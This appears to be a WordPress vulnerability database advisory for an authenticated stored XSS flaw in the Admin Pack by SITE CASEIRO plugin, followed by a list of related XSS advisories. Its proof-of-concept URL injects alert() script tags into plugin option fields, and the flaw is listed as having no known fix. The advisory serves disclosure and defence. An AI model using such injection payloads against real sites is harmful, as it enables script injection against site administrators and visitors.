Admin Pack by SITE CASEIRO <= 1.1 – Authenticated Stored Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The admin-pack-by-site-caseiro WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-admin/options-general.php?page=admin-pack-by-site-caseiro/admin-pack-sc.php&submit=adsf&sc_plugin_admin_personalizado_imagem=</style></textarea><script>alert(1)</script>&sc_plugin_admin_personalizado_rodape=</textarea><script>alert(2)</script>

Affects Plugins

admin-pack-by-site-caseiro

No known fix

References

URL

https://packetstormsecurity.com/files/#132909/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

Yes

WPVDB ID

92e9fb4e-add1-4668-a0ab-de5206dd185d

Timeline

Publicly Published

2015-08-04 (about 10 years ago)

Added

2015-08-05 (about 10 years ago)

Last Updated

2019-10-22 (about 6 years ago)

Other

Published

Title

Published

2025-01-14

Title

Multifox <= 1.3.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2020-01-21

Title

Chatbot with IBM Watson < 0.8.21 - DOM Cross-Site Scripting (XSS)

Published

2025-06-26

Title

Ninja Forms < 3.10.2.2 - Contributor+ Stored XSS via CSTI

Published

2023-11-07

Title

Countdown and CountUp, WooCommerce Sales Timer < 1.8.3 - Admin+ Stored XSS

Published

2014-08-01

Title

Newsletter Manager < 1.0.2 - Authenticated Reflected Cross Site Scripting